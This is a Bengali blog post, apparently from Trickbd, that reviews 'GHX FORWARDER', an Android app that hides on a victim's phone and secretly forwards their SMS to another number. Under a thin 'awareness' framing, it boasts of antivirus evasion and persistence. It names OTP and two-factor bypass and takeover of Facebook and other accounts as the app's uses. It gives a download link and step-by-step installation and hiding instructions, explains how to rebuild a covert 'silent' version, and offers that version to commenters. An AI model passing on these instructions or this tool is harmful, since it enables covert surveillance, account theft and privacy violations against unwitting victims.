(TheGm404) এসএমএস ফরওয়ার্ড হ্যাক হয়ে যেতে পারে আপনার সাধের অ্যাকাউন্টটি
আসসালামু আলাইকুম
স্বাগতম সকল ট্রিকবিডি মেম্বার আশা করি সবাই ভাল আছেন
তো আমি একটা অ্যাপ রিভিউ করব এবং তার সাথে হ্যাকিংয়ের সম্পর্ক নিয়ে আলোচনা করব।
আজকের পোস্ট বিষয়গুলো হলো:-
1) এসএমএস ফরোয়ার্ড কি
2) এসএমএস ফরোয়ার্ড কেন করা হয়
3) কিভাবে এসএমএস ফরওয়ার্ড করব
4)GHX FORWARDER REVIEW
5) এসএমএস ফরওয়ার্ডার ভালো দিক
6) এসএমএস ফরওয়ার্ড এর খারাপ দিক
—–এসএমএস ফরোয়ার্ড কি——-
এসএমএস ফরওয়ার্ড হয়ে এমন একটা সিস্টেম যার মাধ্যমে আপনার এসএমএসগুলো অন্য কোন ডিভাইস এ ফরওয়ার্ড করা হয়। মনে করুন আপনার কাছে দুটি ডিভাইস আছে একটা সিম্ফোনি আরেকটা নোকিয়া। এখন আপনার সিম্ফোনি ফোনটাই যতগুলো এসএমএস বা মেসেজ আসে সেই মেসেজগুলা অটোমেটিক আপনার নোকিয়া মোবাইলে চলে যায়। এটাই এসএমএস ফরোয়ার্ড ।
—–এসএমএস ফরোয়ার্ড কেন করা হয়—–
বিভিন্ন পারপোজ বা প্রয়োজন অনুসারে এসএমএস ফরোয়ার্ড সিস্টেম ব্যবহার করা হয়। এটাই অবৈধ কাজে বেশি ব্যবহার করা হয়।আবার অনেকে প্রয়োজন অনুসারে ব্যবহার করতে পারেন যেমন আপনার একটা সিম বন্ধ রয়েছে কিন্তু ঐ সিমের এসএমএস গুলো আপনি রিড করতে চান তখন ওই বন্ধ সিমের মেসেজ গুলো আপনার সচল সিমে ফরোয়ার্ড করতে পারেন।
—–এসএমএস ফরওয়ার্ড কিভাবে করব—–
এসএমএস ফরওয়ার্ড এর জন্য আপনি দুই ধরনের সিস্টেম ব্যবহার করতে পারেন।
প্রথম টেকনিক হল ইউএসডিডি কোড মাধ্যমে।
আর অন্যদিকে কোন এন্ড্রয়েড এপিকে এর মাধ্যমে।
তবে ইউএসডিডি কোড সিস্টেম জিএসএম ফোন বাটন মোবাইল এ কাজ করবে। আর এন্ড্রয়েড ফোনে উভয় সিস্টেমেই কাজ করবে।
আপাতত আইওএস অপারেটিং সিস্টেম নিয়ে কথা বলছি না কারণ এটা ইউজার খুবই কম আছে(টেকনিক ১ ব্যবহার করবেন)।
———-টেকনিক 1————:
আপনি আপনার অপারেটর সার্ভিস সেন্টারে ফোন দিয়ে আপনার অপারেটরের ফরওয়ার্ড কোড জেনে নিন (১২১)। তার আপনাকে সম্পূর্ণ প্রসেস বলে দেবে কিভাবে কি করবেন।
তবে এক্ষেত্রে একটা বড় সমস্যা হলো তারা যেকোনো সময় চাইলে এটা বন্ধ করে দিতে পারে (অপারেটর কোম্পানি)।
——-টেকনিক 2——–:
এক্ষেত্রে আপনাকে GHX FORWARDER সফটওয়্যার ব্যবহার করতে হবে। এটা ভিকটিমের ইনকামিং মেসেজ ক্যাপচার করবে এবং আপনার সিমে ফরওয়ার্ড করে দিবে। এই টেকনিক আপনি অ্যান্ড্রয়েড অপারেটিং সিস্টেমে ব্যবহার করতে পারবেন।
——GHX FORWARDER REVIEW—–
ফরওয়ার্ডার সম্পর্কে সম্পূর্ণ ধারণা তো পেয়ে গেছেন এবার একটু প্র্যাকটিক্যালি দেখা যাক।
#এপিকে টির কিছু ফিচার
1)Android(4.4-8.0) Supported
2)Fully Fud(0-36)All Antivirus Bypass
3)24X7 Day persistent
4)Instant Forward Sms
5)Offline Work(No Internet Required)
6)After Rebot Auto Start Working
7)Remotely Control Without Touching (This Option Available on silent version)
8)Sim Oparator Not Detect This
#এটা দিয়ে কি কি করা যেতে পারে
১) ওটিপি বাইপাস/টু স্টেপ অথেন্টিকেশন
২) ফেসবুক/ টুইটার /ইমো এর মত অ্যাকাউন্ট অ্যাক্সেস
৩) একথায় এসএমএস দিয়ে ভেরিফিকেশন করা হয় এমন সব একাউন্ট
——Public Version Review—-
#কিভাবে কি করবো এখন শুরু করা যাক
Google Drive Link: https://bit.ly/GhxForwarder(Direct)
১) সফটওয়্যার টি ডাউনলোড এন্ড টার্গেট ফোনে
ইনস্টল করে দিন
২) টার্গেট নাম্বারে আপনার ফোন নাম্বার দিয়ে সেটাপে ক্লিক করুন
৩)Hide Me! বাটনে ক্লিক করুন তাহলে সফটওয়্যারটি Hide হয়ে যাবে
ব্যাস আপনার কাজ শেষ এখন আপনার দেয়া এই নাম্বারে মেসেজ আসা শুরু করবে।
প্রয়োজনে আপনি অন্য ফোন থেকে ভিকটিমের ফোনে একটি মেসেজ পাঠিয়ে পরীক্ষা করে নিতে পারেন।
——Silent Version Review——
without touching remotely ফরওয়ার্ড যা silent ভার্সনে ডিজাইন করা হয়েছে।
এটা Install করে ওপেন করার সাথে সাথে অটোমেটিক হাইড & একটিভ যাবে
এটা-সেটাপের জন্য আপনার অ্যাপ এডিটর প্রয়োজন হবে।
প্রথমে ফাইল থেকে সফটওয়্যার টি ওপেন করুন অ্যাপ এডিটর দিয়ে।
Flow This Step:
1) Select Apk From File
1)Full Edit(Resource Re Build) ক্লিক করুন
2)File ক্লিক করুন
3)res ফোল্ডার ওপেন করুন
4)Value ফোল্ডার ওপেন করুন
5)string.xml এ ক্লিক করুন
screenshot দেখানো নাম্বারটি remove করে আপনার নাম্বার দিয়ে apk rebuild করে দিন।
হয়ে গেল আপনার সাইলেন্ট ফরওয়ার্ডার।
এটা কিভাবে পাবেন সেটা নিয়ে পোস্ট শেষে কথা বলা হয়েছে।
—–এসএমএস ফরওয়ার্ডার ভালো দিক—–
হতে পারে আপনি কোন সাইবের ক্রিমিনাল কে ধরতে চেষ্টা করছেন হতে পারে তার উপর নজর রাখতে চাইছেন তাহলে এটা হতে পারে একটা ভালো মাধ্যম। অথবা আপনি দেশের স্বার্থে একটা খারাপ মানুষের বিরুদ্ধে কাজ করছেন তাহলে এটা একটি নিঃসন্দেহে ভালো কাজ।
—–এসএমএস ফরওয়ার্ডার খারাপ দিক—–
যেমন এটার মাধ্যমে যে কারো পার্সোনাল অ্যাকাউন্ট সিকিউরিটি নষ্ট হয়।তোর থেকে সামান্য একটা 6 ডিজিটের কোড এর কারনে তার সকল সিকিউরিটি শেষ।তার মূল্যবান বা একান্ত নিজস্ব পার্সোনাল জিনিস ভাইরাল হয়ে যেতে পারে।
আসে এটা সামাজিক অ্যাকাউন্ট থেকে হতে পারে কারণ এসএমএসের কোড মাধ্যমে যেকোনো অ্যাকাউন্ট হ্যাক করা সম্ভব। বিভিন্ন ফিডের নিম্নে স্ক্যামাররা এই টেকনিক ব্যবহার করে খুব সহজেই হাতিয়ে নিচ্ছে একাউন্ট।
—–এখন আপনাদের কিছু প্রশ্নের উত্তর——
১) এই পোস্ট করার মানে কি এটা তো অনেকে জানে?
#এটা করা মানে কিভাবে হ্যাক হয়ে যেতে পারে আপনার অ্যাকাউন্ট সেটা সম্পর্কে একটা কনসেপ্ট বা ধারণা দেওয়া হয়েছে।
২) যদি ভিকটিমের ফোন হাতে নেওয়া লাগে তাহলে মজা কোথায়?
#হ্যাঁ সবার সিকিউরিটি নিরাপত্তার জন্য ফোন হাতে নেয়া হয়েছে সিস্টেম আমি মেক করেছি।
কারণ কারো প্রাইভেসি নষ্ট করা আমার কাজ নয়।
আমি সাইলেন্ট Version Review করেছি তবে সেটা সবাইকে শেয়ার করতেছি না সিকিউরিটি নিরাপত্তার জন্য।
৩) আমি কিভাবে silent ভার্শন পেতে পারি?
যদিও সাইলেন্ট ভার্শন সবাইকে শেয়ার করতেছি না। কারণ এটা অন্য নিরাপত্তা হুমকি কারণ হতে পারে।যেহেতু রিভিউ করছি তাই আপনাদের মাঝে কিছু মানুষকে অবশ্যই দিব।
আপনারা কমেন্টে আপনাদের ইমেইল অথবা ফেসবুক আইডি অথবা ইমো আইডি দিয়ে যেকোনো একটি লিখে কমেন্ট করুন যাতে বিজয়ির কাছে সফটওয়ারটি পৌঁছাতে পারি।
——কারা পাবে সাইলেন্ট ভার্শন———
সর্বপ্রথম 50 জন কমেন্টকারী ব্যক্তিদের মধ্যে স্পিন করা হবে এবং তাদের মধ্য থেকে 10 জন ব্যক্তিকে সফটওয়ারটি দেওয়া হবে।
আমি অনুরোধ করছি বিজয় ভাইদের আপনারা অবশ্যই এটি ভালো কাজে ব্যবহার করবেন।
আমাদের পার্সোনাল ইনফো:
ফেসবুক: টিম বাংলাদেশ
ইউটিউব:GM SMART HACKER
লিংক দেয়ার প্রয়োজন নেই সার্চ দিলেই পেয়ে যাবেন।
টেকনোলজি সম্পর্কে যেকোনো বিষয়ে ফ্রি মাইন্ডে জিজ্ঞেস করতে জয়েন করতে পারেন।
আসসালামু আলাইকুম।
আল্লাহাফেজ।
The post (TheGm404) এসএমএস ফরওয়ার্ড হ্যাক হয়ে যেতে পারে আপনার সাধের অ্যাকাউন্টটি appeared first on Trickbd.com.
from Trickbd.com
Source url: https://ift.tt/2EJqjJ2
Tags: Bangla Jokes, Jobs
পোষ্ট ভালো লাগলে শেয়ার করবেন। আমাদের ফেসবুক পাইজ এ লাইক দিবেন। আমরা সকল পোষ্ট ফেসবুক এ শেয়ার করে থাকি।
Comments
Post a Comment